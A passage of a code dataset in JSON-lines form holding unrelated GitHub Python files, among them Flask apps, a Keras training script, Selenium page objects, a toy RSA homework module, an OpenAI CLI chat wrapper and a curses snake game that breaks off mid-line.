title\nplt.ylim(0,2.2) # set the y-axis display range\nplt.legend() # show the legend\nplt.show() # display the plot","repo_name":"yidaodashi/pythonSkills","sub_path":"python数据分析与实战演练/简介/matplotlibtest.py","file_name":"matplotlibtest.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7563442105","text":"\ndef freecad_format(data_list):\n mesh_name = \"Mesh.add(\"\n converted = []\n for poly in data_list[2]:\n # print poly\n polygon = []\n for vert in poly:\n # print vert\n # print data_list[1][vert - 1]\n polygon.append(data_list[1][vert - 1])\n # print polygon\n converted += polygon\n\n # converted = map(lambda x: mesh_name + str(x) + \")\", converted)\n\n return converted\n","repo_name":"SimonTanner/BioDesic-Pattern-Fitter","sub_path":"freecad_formatter.py","file_name":"freecad_formatter.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22421027535","text":"from lib2to3.pgen2.token import NEWLINE\nfrom os import name\nfrom urllib import request\nfrom flask import Flask, render_template, request, redirect\nimport csv\n\napp = Flask(__name__)\n\n# @app.route(\"/\")\n# def hello_world():\n# return \"<p>Hello, World!</p>\"\n\n@app.route(\"/\")\ndef home_page():\n return render_template('index.html')\n\n@app.route(\"/<string:page_name>\")\ndef html_page(page_name):\n return render_template(page_name)\n\n# @app.route('/submit_form', methods=['POST', 'GET'])\n# def submit_form():\n# return 'Form submitted successfully!'\n\n\ndef write_csv(data):\n with open('database.csv', mode='a', newline='') as my_csv_file:\n email = data[\"email\"]\n subject = data[\"subject\"]\n message = data[\"message\"]\n csv_writer = csv.writer(my_csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow([email,subject,message])\n\ndef write_data(data):\n with open('database.txt', mode='a') as myfile:\n email = data[\"email\"]\n subject = data[\"subject\"]\n message = data[\"message\"]\n myfile.write(f'\\n {email} {subject} {message}')\n\n@app.route('/submit_form', methods=['POST', 'GET'])\ndef submit_form():\n if request.method == 'POST':\n try:\n data = request.form.to_dict()\n write_csv(data)\n return redirect('/thank_you.html')\n except:\n return 'failed to be saved into the database.'\n else:\n return 'Something went wrong. 
'","repo_name":"andrewleung01/portfolio","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24636358316","text":"def insert_space(text: str, index: int):\n text = text[:index] + ' ' + text[index:]\n print(text)\n return text\n\n\ndef reverse(text: str, sub_str: str):\n if sub_str in text:\n index = text.index(sub_str)\n text = text[:index] + text[index + len(sub_str):] + sub_str[::-1]\n print(text)\n return text\n print('error')\n return text\n\n\ndef change(text: str, sub_str: str, replacement: str):\n text = text.replace(sub_str, replacement)\n print(text)\n return text\n\n\nmessage = input()\ncommand = input()\nwhile not command == 'Reveal':\n command = command.split(':|:')\n if command[0] == 'InsertSpace':\n message = insert_space(message, int(command[1]))\n elif command[0] == 'Reverse':\n message = reverse(message, command[1])\n elif command[0] == 'ChangeAll':\n message = change(message, command[1], command[2])\n command = input()\nprint(f'You have a new text message: {message}')\n\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Fundamentals/Exams/03.Final_Exam_Retake/Secret_Chat.py","file_name":"Secret_Chat.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"40341081347","text":"import networkx as nx\nimport networkx.algorithms.community as nx_comm\nimport matplotlib.pyplot as plt\nfrom networkx.generators.random_graphs import gnm_random_graph\nimport pandas as pd\nimport numpy as np\nimport time\n# from SparseShield_NIvsHS.Scripts.SparseShieldSolver import SparseShieldSolver\n# from SparseShield_NIvsHS.Scripts.SparseShieldSeedlessSolver import SparseShieldSeedlessSolver\n# from SparseShield_NIvsHS.Scripts.NetShieldSolver import NetShieldSolver\nimport os\nimport tensorflow as tf\nfrom keras.models import load_model\nfrom keras.optimizers import SGD\nfrom matplotlib.figure import Figure\nimport random\n\nfrom flask import Flask, render_template, request\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nimport base64\nfrom io import BytesIO\n\napp = Flask(__name__, static_url_path='/static')\n\n\n\ndef read_graph_from_file(tree_dir, filename):\n with open(os.path.join(tree_dir, filename), 'r') as file:\n G = nx.DiGraph()\n for line in file:\n if '->' in line:\n parent_node, child_node = line.strip().split('->')\n G.add_edge(parent_node, child_node)\n return G\n\ndef str_to_npa(s):\n data_list = s.split(' ')\n c = 0\n for x in data_list:\n if x == '':\n c += 1\n for _ in range(c):\n data_list.remove('')\n data_array = np.array([float(num) for num in data_list])\n return data_array\n\ntree_dir = 'twitter15/tree'\nd1 = pd.read_csv('t15_text_n2v.csv')\nd1['n2v'] = d1['n2v'].apply(lambda x: x.replace('[', ''))\nd1['n2v'] = d1['n2v'].apply(lambda x: x.replace(']', ''))\nd1['n2v'] = d1['n2v'].apply(lambda x: str_to_npa(x))\n\nnodes_list = []\n\nwith open('t15_imm_nodes.txt', 'r') as f:\n for line in f:\n row_data = line.strip().split(',')[:-1] \n priority_nodes = [int(node) for node in row_data] \n nodes_list.append(priority_nodes)\n\nd1['nodes'] = nodes_list\nprint(\"Load BERT embeddings\")\nembeddings = np.load('bert_embeddings.npy')\n\nd1['bert_embeddings'] = list(embeddings)\n\n# model = load_model(\"model.h5\", 
compile=False)\n# model.compile(loss='binary_crossentropy', optimizer=SGD(), metrics=['accuracy'])\nfull_model = load_model(\"bert_n2v_model.h5\", compile=False)\nfull_model.compile(loss='binary_crossentropy', optimizer=SGD(), metrics=['accuracy'])\n\ndef draw_graph(row_index):\n tweet_id = d1.loc[row_index, 'tweet_id']\n G = read_graph_from_file(tree_dir, str(tweet_id) + \".txt\")\n pos = nx.kamada_kawai_layout(G)\n fig = plt.figure(figsize=(5, 5))\n nx.draw_networkx(G, pos, with_labels=True, node_color='skyblue', node_size=500, edge_color='gray')\n plt.axis('off')\n return fig\n\ndef draw_graph2(G):\n fig = plt.figure(figsize=(5, 5))\n pos = nx.kamada_kawai_layout(G)\n node_options = {\"node_color\": \"red\", \"node_size\":30}\n edge_options = {\"width\": .5, \"alpha\": .5, \"edge_color\":\"black\"}\n nx.draw_networkx_nodes(G, pos, **node_options)\n nx.draw_networkx_edges(G, pos, **edge_options)\n return fig\n \n\ndef draw_graph_imm(G, immunized_nodes):\n nodes = G.nodes()\n nodes_list = list(nodes)\n nodes_list[0]\n d = {nodes_list[i]: i for i in range(len(nodes_list))}\n H = nx.relabel_nodes(G, d)\n G = H.copy()\n\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))\n pos = nx.kamada_kawai_layout(G)\n \n \n immunized_node_options = {\"node_color\": \"green\", \"node_size\": 30}\n default_node_options = {\"node_color\": \"red\", \"node_size\": 30}\n \n nx.draw_networkx_nodes(G, pos, nodelist=immunized_nodes, ax=ax2, **immunized_node_options)\n \n non_immunized_nodes = [node for node in G.nodes() if node not in immunized_nodes]\n nx.draw_networkx_nodes(G, pos, nodelist=non_immunized_nodes, ax=ax2, **default_node_options)\n \n nx.draw_networkx_nodes(G, pos, ax=ax1, **default_node_options)\n\n ax2.set_title(\"Graph with Immunized nodes highlighted\") \n ax1.set_title(\"Original Graph\")\n \n \n edge_options = {\"width\": 0.5, \"alpha\": 0.5, \"edge_color\": \"black\"}\n nx.draw_networkx_edges(G, pos, ax=ax1, **edge_options)\n nx.draw_networkx_edges(G, pos, ax=ax2, **edge_options)\n \n return fig\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n number = int(request.form['number'])\n row_index = number\n text = d1.loc[row_index, 'text']\n tweet_id = d1.loc[row_index, 'tweet_id']\n bert_embedding = d1.loc[row_index, 'bert_embeddings']\n n2v_embedding = d1.loc[row_index, 'n2v']\n imm_nodes = d1.loc[row_index, 'nodes']\n input_embedding = bert_embedding.reshape(1, 33, 768)\n input_node = n2v_embedding.reshape(1, 100)\n input_node_tensor = tf.convert_to_tensor(input_node)\n input_tensor = tf.convert_to_tensor(input_embedding)\n prediction = full_model.predict([input_tensor, input_node_tensor])\n if prediction > 0.5:\n prediction = \"True News\"\n prediction_class = \"true-news\"\n else:\n prediction = \"Fake News\"\n prediction_class = \"fake-news\"\n print(prediction)\n G = read_graph_from_file(tree_dir, str(tweet_id) + \".txt\")\n fig = draw_graph_imm(G, imm_nodes)\n # Convert the figure to an image\n output = BytesIO()\n FigureCanvas(fig).print_png(output)\n image_data = base64.b64encode(output.getvalue()).decode('utf-8')\n return render_template('index.html', text=text, prediction=prediction, prediction_class=prediction_class, image_data=image_data)\n return render_template('index.html')\n\nif __name__ == '__main__':\n 
app.run(debug=True)","repo_name":"mariusmarogel/FNDM","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24639395329","text":"#!/usr/bin/env python3\nfrom __future__ import print_function\nimport os\nimport tensorflow as tf\nimport numpy as np\n\nfrom dataloader_cropped_mass import async_data_loader, convert_lbl_to_ind\nfrom dataloader_cropped_mass import load_images_with_labels, clean_data\nfrom model import SmallConvNet, ImageClassifier, DenseNet\nimport time\nimport matplotlib.pyplot as plt\nimport scipy.misc\n\n\ndef analyze_image_data():\n '''\n Plots some useful statistics about the images...\n '''\n Xdat, Ydat = load_images_with_labels(0, 40, verbose=True)\n Ydat = np.array(convert_lbl_to_ind(Ydat))\n pdat = Xdat\n Xdat = list(map(lambda i: 256.0 * (i - i.min()) / (i.max() - i.min()), Xdat))\n Xdat = np.array(list(map(\n lambda i: scipy.misc.imresize(i, (226, 226)), Xdat)))\n\n for i in range(60):\n plt.subplot(133)\n plt.imshow(pdat[i])\n\n plt.subplot(131)\n plt.hist(Xdat.flatten(), bins=300)\n plt.subplot(132)\n plt.imshow(Xdat[i], cmap='Greys')\n plt.show()\n\n\ndef evaluate_cv_stats(sess, start, end, model, batch_size=32):\n total_accuracy = 0.0\n total_error = 0.0\n cvX, cvY = load_images_with_labels(start, end, verbose=True)\n cvX, cvY = clean_data(cvX, cvY)\n for i in range(0, cvX.shape[0], batch_size):\n acc, err = sess.run([model.accuracy, model.error],\n feed_dict={model.X: cvX[i:i+batch_size],\n model.Y: cvY[i:i+batch_size],\n model.m.training: False})\n total_accuracy += min(batch_size, cvX.shape[0] - i) * acc\n total_error += min(batch_size, cvX.shape[0] - i) * err\n return total_accuracy / cvX.shape[0], total_error / cvX.shape[0]\n\n\ndef train(M, out_classes=3, cv_iters=100):\n m = ImageClassifier(M, out_classes)\n global_step = m.global_step\n train_op = tf.train.MomentumOptimizer(1e-2, 0.9).minimize(m.error,\n global_step=global_step)\n\n summary_op = tf.summary.merge_all()\n logdir = os.path.join(\"tflogs\", m.name)\n sw = tf.summary.FileWriter(logdir)\n sv = tf.train.Supervisor(summary_op=None,\n summary_writer=None,\n logdir=logdir,\n global_step=global_step,\n save_model_secs=120)\n\n with sv.managed_session() as sess:\n data_gen = async_data_loader(size=(226, 226), start=0, end=1000, batch_size=32)\n sw.add_graph(sess.graph)\n while not sv.should_stop():\n start_time = time.perf_counter()\n imgs, lbls = next(data_gen)\n print(\"\\rData loading time: {}\".format(\n time.perf_counter() - start_time), end=\"\")\n lbls = np.array(convert_lbl_to_ind(lbls))\n s, _ = sess.run([summary_op, train_op], feed_dict={m.X: imgs, m.Y: lbls})\n sw.add_summary(s, global_step=sess.run(global_step))\n if sess.run(global_step) % cv_iters == 1:\n print()\n cvAcc, cvErr = evaluate_cv_stats(sess, 1000, 1318, m)\n cv_sum = tf.Summary(value=[\n tf.Summary.Value(tag=\"cv_accuracy\", simple_value=cvAcc),\n tf.Summary.Value(tag=\"cv_error\", simple_value=cvErr)])\n sw.add_summary(cv_sum, global_step=sess.run(global_step))\n print()\n\n\nif __name__ == '__main__':\n train(DenseNet)\n","repo_name":"samuelczhao/lung-cancer-detection-optimization","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38763794400","text":"from selenium.webdriver.common.by import By\nfrom helpers import constants\nfrom pages.BasePO 
import BasePO\nimport allure\n\n\nclass ApplicationFormPO(BasePO):\n \"\"\"Contains methods for interacting with the elements of the 'Application form' page\"\"\"\n\n # FORM BUTTONS\n\n CHECKBOX = (By.CSS_SELECTOR, \"[data-id='approve-rules-checkbox'] > div\")\n ACCEPT_BTN = (By.CSS_SELECTOR, \"[data-id='approve-button']\")\n\n SUSPEND_BTN = (By.CSS_SELECTOR, \"[data-id='suspend-button']\")\n DECLINE_BTN = (By.CSS_SELECTOR, \"[data-id='decline-button']\")\n\n # CHAT\n CHAT_SEND_BTN = (By.CSS_SELECTOR, \"div.chat__footer > a\")\n INSERT_MSG_FIELD = (By.CSS_SELECTOR, \"textarea\")\n\n # COMMENT POPUP\n POPUP_TEXT_FIELD = (By.CSS_SELECTOR, \"[data-id='decline-application-input']\")\n POPUP_SEND_BTN = (By.CSS_SELECTOR, \"[data-id='decline-application-button']\")\n\n def verify_document(self):\n self._wait_elements_displayed([self.DECLINE_BTN, self.ACCEPT_BTN])\n actual_reject_btn = self._get_element_text(self.DECLINE_BTN)\n actual_accept_btn = self._get_element_text(self.ACCEPT_BTN)\n assert actual_reject_btn == constants.REJECT\n assert actual_accept_btn == constants.ACCEPT\n return\n\n\n def click_agree_checkbox(self):\n \"\"\"\n Tick the \"Request application\" checkbox\n \"\"\"\n with allure.step(f\"Tick the 'Request application' checkbox {self.CHECKBOX}\"):\n self._click_element(self.CHECKBOX)\n return self\n\n\n def click_accept_button(self):\n \"\"\"\n Click the \"Sign\" button in the application\n \"\"\"\n with allure.step(f\"Click the 'Sign' button {self.ACCEPT_BTN}\"):\n self._click_element(self.ACCEPT_BTN)\n return self\n\n def click_suspend_button(self):\n \"\"\"\n Click the \"Suspend\" button in the application\n :return:\n \"\"\"\n self._click_element(self.SUSPEND_BTN)\n return self\n\n\n def click_decline_button(self):\n \"\"\"\n Click the \"Decline\" button in the application\n :return:\n \"\"\"\n with allure.step(f\"Click the 'Decline' button {self.DECLINE_BTN}\"):\n self._click_element(self.DECLINE_BTN)\n return self\n\n def verify_popup(self):\n self._wait_for_element_present(self.POPUP_SEND_BTN)\n return self\n\n def fill_decline_comment_popup(self, comments):\n \"\"\"\n Fill in the comment popup and click \"Send\"\n \"\"\"\n with allure.step(f\"Enter text into the {self.POPUP_TEXT_FIELD} field\"):\n self.driver.find_element(*self.POPUP_TEXT_FIELD).send_keys(comments)\n with allure.step(f\"Click the 'Send' button {self.POPUP_SEND_BTN}\"):\n self._click_element(self.POPUP_SEND_BTN)\n return self\n","repo_name":"Siyavush91/pytest_bdd_example","sub_path":"pages/ApplicationFormPO.py","file_name":"ApplicationFormPO.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35162478887","text":"# import libraries\nimport cryptocompare\nimport pandas as pd\nimport datetime as datetime\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn-darkgrid')\n\n#module to fetch cryptocompare data and api key\nimport sys \nsys.path.append(\"..\")\nfrom data_modules.FMDA_quantra import get_cryptocompare_api\n\n#get the api key from data_modules folder\ncryptocompare_API_key=get_cryptocompare_api()\n#set api key in cryptocompare object\ncryptocompare.cryptocompare._set_api_key_parameter(cryptocompare_API_key)\nprint(\"API key is set\")\n\n#fetch the raw ticker list\nraw_ticker_data=cryptocompare.get_coin_list()\n#convert the raw data from dictionary format to DataFrame\nall_tickers=pd.DataFrame.from_dict(raw_ticker_data).T\n\n# last 5 entries\nprint(\".......\")\nprint(all_tickers.tail())\n\n#bitcoin 
hourly data for 5th June 2021\n#define ticker symbol and other details\nticker_symbol='BTC'\ncurrency = 'USD'\nlimit_value = 2000\nexchange_name = 'CCCAGG'\ndata_before_timestamp = datetime.datetime(2021, 6, 5, 0, 0)\n#fetch the raw price data\n","repo_name":"malinitin93/quantinsti-getting-market-data","sub_path":"crypto/cryptodata.py","file_name":"cryptodata.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4548479344","text":"import datetime\r\nimport calendar\r\n\r\n\r\nclass Sukaktis:\r\n def __init__(self, metai=2000, menuo=12, diena=12, valandos=12, minutes=12):\r\n self.metai = metai\r\n self.menuo = menuo\r\n self.diena = diena\r\n self.valandos = valandos\r\n self.minutes = minutes\r\n self.data = datetime.datetime(metai, menuo, diena, valandos, minutes)\r\n\r\n def smulkiai(self):\r\n now = datetime.datetime.now()\r\n skirtumas = now - self.data\r\n print(f\"Years passed: \", skirtumas.days // 365)\r\n print(\"Months passed: \", skirtumas.days / 365 * 12)\r\n print(\"Weeks passed: \", skirtumas.days / 7)\r\n print(\"Days passed: \", skirtumas.days)\r\n print(\"Hours passed: \", skirtumas.total_seconds() / 3600)\r\n print(\"Minutes passed: \", skirtumas.total_seconds() / 60)\r\n print(\"Seconds passed: \", skirtumas.total_seconds())\r\n\r\n def arKeliamieji(self):\r\n if calendar.isleap(self.metai):\r\n print(\"Leap year\")\r\n\r\n def atimtiDienas(self, dienos):\r\n return self.data - datetime.timedelta(days=dienos)\r\n\r\n def pridetiDienas(self, dienos):\r\n return self.data + datetime.timedelta(days=dienos)\r\n\r\n def __str__(self):\r\n return (\r\n f\"Date: {self.metai}-{self.menuo}-{self.diena} {self.valandos}:{self.minutes}\")\r\n\r\n\r\ndata1 = Sukaktis(2000, 1, 1, 12, 12)\r\ndata1.arKeliamieji()\r\ndata1.smulkiai()\r\nprint(data1.atimtiDienas(5))\r\nprint(data1.pridetiDienas(45))\r\nprint(data1)\r\n","repo_name":"DonatasNoreika/python1lygis","sub_path":"Programos/Objektinis programavimas I/uzduotis2.py","file_name":"uzduotis2.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"lt","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"9662069754","text":"import random\n\n\ndef is_prime(n: int) -> bool:\n \"\"\"\n >>> is_prime(2)\n True\n >>> is_prime(11)\n True\n >>> is_prime(8)\n False\n \"\"\"\n if n == 2:\n return True\n if n < 2 or n % 2 == 0:\n return False\n for i in range(2, int(n**0.5) + 1):\n if n % i == 0:\n return False\n return True\n\n\ndef generate_keypair(p: int, q: int):\n if not (is_prime(p) and is_prime(q)):\n raise ValueError(\"Both numbers must be prime.\")\n elif p == q:\n raise ValueError(\"p and q cannot be equal\")\n\n n = p * q\n\n phi = (p - 1) * (q - 1)\n\n e = random.randrange(1, phi)\n\n g = gcd(e, phi)\n while g != 1:\n e = random.randrange(1, phi)\n g = gcd(e, phi)\n\n d = multiplicative_inverse(e, phi)\n return ((e, n), (d, n))\n\n\ndef gcd(a: int, b: int) -> int:\n \"\"\"\n >>> gcd(12, 15)\n 3\n >>> gcd(3, 7)\n 1\n \"\"\"\n while a != 0 and b != 0:\n if a >= b:\n a %= b\n else:\n b %= a\n return a or b\n\n\ndef multiplicative_inverse(e: int, phi: int) -> int:\n \"\"\"\n >>> multiplicative_inverse(7, 40)\n 23\n \"\"\"\n n = phi\n u, u1 = 1, 0\n v, v1 = 0, 1\n while phi:\n q = e // phi\n u, u1 = u1, u - q * u1\n v, v1 = v1, v - q * v1\n e, phi = phi, e - q * phi\n return u % 
n\n","repo_name":"soreloserrr/cs102","sub_path":"homework01/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17195788727","text":"import sys\n\nsys.setrecursionlimit(10 ** 5)\ninput = sys.stdin.readline\n\n# parent 와 depth 기록\ndef dfs(x, dep):\n # depth 기록\n depth[x] = dep\n visited[x] = True\n\n for g in graph[x]:\n if not visited[g]:\n # parent 기록 후 재귀적 탐색\n parent[g] = x\n dfs(g, dep + 1)\n\nn = int(input())\n\ngraph = [[] for _ in range(n + 1)]\nparent = [0] * (n + 1)\ndepth = [0] * (n + 1)\nvisited = [False] * (n + 1)\n\nfor _ in range(n - 1):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\ndfs(1, 0)\n\nm = int(input())\n\nfor _ in range(m):\n a, b = map(int, input().split())\n\n # depth 먼저 맞춰주기\n while depth[a] != depth[b]:\n if depth[a] > depth[b]:\n a = parent[a]\n else:\n b = parent[b]\n\n # 부모로 올라가면서 LCA 탐색\n while a != b:\n a = parent[a]\n b = parent[b]\n\n print(a)","repo_name":"JungWooGeon/BAEKJOON","sub_path":"11437.py","file_name":"11437.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29564763807","text":"import shutil\nfrom pathlib import Path\n\nfrom cli_chat.bot import Bot\nfrom cli_chat.console import Console\nfrom cli_chat.command import CommandManager\n\nfrom appdirs import user_config_dir\nfrom typer import Typer, Argument, Option\n\n\ndef read_key(key_path: Path, console: Console):\n if not key_path.exists():\n console.info(\"No OpenAI key found. Please go to https://beta.openai.com/account/api-keys to get one.\")\n update_key()\n\n with key_path.open() as f:\n return f.read().strip()\n\n\napp = Typer(add_completion=False)\nconfig_app = Typer(add_completion=False, no_args_is_help=True)\nconfig_dir = Path(user_config_dir(\"cli_chat\"))\nconsole = Console(history_dir=config_dir / \"history\")\n\n\n@app.callback(invoke_without_command=True)\ndef main(\n model: str = Option(\"gpt-3.5-turbo\", \"--model\", \"-m\", help=\"The model to use.\", prompt=True),\n):\n api_key = read_key(config_dir / \"key\", console)\n Bot(openai_api_key=api_key,\n console=console,\n command_manager=CommandManager(),\n model=model\n )()\n\n\n@config_app.command(help=\"Update the OpenAI key.\")\ndef update_key():\n api_key = console.prompt(\n \"Please key in a valid OpenAI Key: \",\n is_password=True,\n )\n with (config_dir / \"key\").open(\"w\") as f:\n f.write(api_key)\n console.info(\"Key updated.\")\n\n\n@config_app.command(help=\"Remove the OpenAI key.\")\ndef remove_key(\n):\n if (config_dir / \"key\").exists():\n (config_dir / \"key\").unlink()\n console.info(\"Key removed.\")\n else:\n console.error(\"No key found.\")\n\n\n@config_app.command(help=\"Clear the input history.\")\ndef clear_history():\n shutil.rmtree(config_dir / \"history\")\n console.info(\"History cleared.\")\n","repo_name":"Tefx/cli-chat","sub_path":"cli_chat/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"1025292088","text":"# Luana Strimbeanu Grupa 343\n\n# 1\nfs = 44.1 # kHz\nfs *= 1000 # Hz\nbindist = 1 # Hz\n# bindist = fs/N\nN = fs / bindist\n\nprint(N)\n\n# 2\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef rectangle(dim):\n return 1\n\n\ndef hanning(dim):\n return 0.5 * (1 - np.cos(2 * np.pi * dim / 
Nw))\n\n\n# a\nNw = 200\nfs = 100\nt = np.linspace(0, 1, num=Nw)\nx = np.sin(2 * np.pi * fs * t)\n\nxwr = []\nfor i in range(Nw):\n    xwr.append(x[i] * rectangle(i))\n\nxwhn = []\nfor i in range(Nw):\n    xwhn.append(x[i] * hanning(i))\n\n# plt.plot(xwr)\n# plt.plot(xwhn)\n# plt.show()\n\n# b\n\nf1 = 1000 # Hz\nf2 = 1100 # Hz\nfs = 8000 # Hz\nNw = 1000\n\nt = np.linspace(0, Nw, num=fs)\nx1 = np.sin(2 * np.pi * f1 * t)\nx2 = np.sin(2 * np.pi * f2 * t)\n\nxwr1 = []\nfor i in range(Nw):\n    xwr1.append(x1[i] * rectangle(i))\n\nxwr2 = []\nfor i in range(Nw):\n    xwr2.append(x2[i] * rectangle(i))\n\n# plt.plot(xwr1)\n# plt.plot(xwr2)\n# plt.show()\n\n# the sinusoid that uses the second frequency has\n# a higher chance of capturing more signals\n\n# 3\n\n# a\n\nnsamples = 3 * 24 # (3 days x 24h)\nf = open('trafic.csv')\n\ncnt = 1\nsamples = []\n\nfor lin in f:\n    if cnt > nsamples:\n        break\n    else:\n        # the first sample looks odd for some reason\n        if cnt != 1:\n            samples.append(int(lin.strip()))\n    cnt += 1\n\n# b\n\navg = []\nfor windowsize in [5, 9, 13, 17]:\n    average = np.convolve(samples, np.ones(windowsize) / windowsize, 'valid') # moving-average results\n    avg.append(average)\n    plt.plot(average)\n\nplt.show()\n\n\n\n","repo_name":"st-lu/University","sub_path":"Signal Processing/lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"13465611455","text":"import curses\r\nfrom curses import textpad\r\nfrom random import randint\r\nimport csv\r\n#Estructuras Importadas\r\nimport CircularDobleEnlazada\r\nimport Pila\r\nimport Cola\r\nimport EnlazadaDoble\r\n\r\nmenu = ['1. Jugar', '2. Tabla de Punteo', '3. Selección Usuario', '4. Reportes', '5. Carga Masiva']\r\nreportes = ['1. Punteos', '2. 
Usuarios']\r\n# Estructuras\r\nuserScoreReport = Cola.Cola()\r\nusuarios = CircularDobleEnlazada.CDEnlazada()\r\n## Aqui funcionará el juego\r\ndef pintarJuego(stdscr, nombreUsuario):\r\n if nombreUsuario is \"\":\r\n registrarUsuario(stdscr)\r\n else:\r\n serpiente = EnlazadaDoble.listaDE()\r\n score = Pila.Pila()\r\n stdscr.clear()\r\n velocidad = 150\r\n punteo = 0\r\n nivel = 1\r\n #Punteo de cambio de nivel\r\n pt = 5\r\n quitar = 50\r\n stdscr.timeout(velocidad)\r\n alto, ancho = stdscr.getmaxyx()\r\n stdscr.addstr(1 , 1 ,\"Puntaje = \" + str(punteo))\r\n stdscr.addstr(1 , ancho//2,\"Nivel = \" + str(nivel))\r\n stdscr.addstr(1 , ancho - len(\"Usuario\"),\"Usuario = \" + str(nombreUsuario))\r\n randomY = randint(3,alto-3)\r\n randomX = randint(3,ancho - 4)\r\n comidita = \"+\"\r\n stdscr.addstr(randomY, randomX, comidita)\r\n stdscr.border(0)\r\n textpad.rectangle(stdscr, 2, 2, alto - 2, ancho - 3)\r\n # Inserto el cuerpo inicial de la serpiente\r\n serpiente.insertar(alto//2, ancho//2 - 1)\r\n serpiente.insertar(alto//2, ancho//2)\r\n serpiente.insertar(alto//2, ancho//2 + 1)\r\n # Fin creación de serpiente\r\n # temporal para recorrer la serpiente y dibujar sus coordenadas\r\n temporalSerpiente = serpiente.ancla\r\n key = 452\r\n keyAnterior = key\r\n direccion = curses.KEY_LEFT\r\n while temporalSerpiente.siguiente is not None:\r\n temporalSerpiente = temporalSerpiente.siguiente\r\n stdscr.addstr(int(str(temporalSerpiente.cY)), int(str(temporalSerpiente.cX)), \"#\")\r\n stdscr.refresh()\r\n # Bucle del Juego\r\n colision_sinComida = False\r\n Pausa = False\r\n while True:\r\n if punteo == pt and velocidad > 25 and nivel < 3:\r\n nivel += 1\r\n pt = pt + 5\r\n velocidad = velocidad - quitar\r\n quitar += 40\r\n stdscr.timeout(velocidad)\r\n temporal = serpiente.ancla.siguiente\r\n tempCX = 0\r\n tempCY = 0\r\n\r\n if key > 0:\r\n keyAnterior = key\r\n \r\n key = stdscr.getch()\r\n #He creado esta restricción, ya que no se me ocurre como voltear a la serpiente\r\n # cuando esta sea muy larga y tenga muchos dobleces\r\n if key in [curses.KEY_UP, 450] and (keyAnterior in [curses.KEY_DOWN, 456]):\r\n key = keyAnterior\r\n elif key in [curses.KEY_DOWN, 456] and keyAnterior in [curses.KEY_UP, 450]:\r\n key = keyAnterior\r\n elif key in [curses.KEY_LEFT, 452] and keyAnterior in [curses.KEY_RIGHT, 454]:\r\n key = keyAnterior\r\n elif key in [curses.KEY_RIGHT, 454] and keyAnterior in [curses.KEY_LEFT, 452]:\r\n key = keyAnterior\r\n\r\n stdscr.clear()\r\n if key in [curses.KEY_UP, curses.KEY_DOWN, curses.KEY_LEFT, curses.KEY_RIGHT] or key in [450, 456, 452, 454]:\r\n direccion = key\r\n elif key in [curses.KEY_ABORT, 27]:\r\n #Boton de Pausa\r\n if Pausa is False:\r\n Pausa = True\r\n else:\r\n Pausa = False\r\n \r\n if temporal.cX == randomX and temporal.cY == randomY:\r\n ## Agrego los valores a la pila para el score result\r\n score.push(randomX, randomY)\r\n ## Luego creo el reporte del mismo\r\n score.graficar()\r\n #################################\r\n if comidita is \"+\":\r\n serpiente.insertar(0,0)\r\n colision_sinComida = False\r\n punteo += 1\r\n elif comidita is \"*\":\r\n serpiente.eliminar()\r\n colision_sinComida = False\r\n serpiente.actualizar(temporal.cX,temporal.cY)\r\n if punteo > 0:\r\n punteo -= 1\r\n #################################\r\n randomX = randint(3, ancho - 4)\r\n randomY = randint(3, alto - 3)\r\n crecer_o_disminuir = randint(0,10)\r\n\r\n if crecer_o_disminuir >= 0 and crecer_o_disminuir <= 6:\r\n comidita = \"+\"\r\n stdscr.addstr(randomY, randomX, 
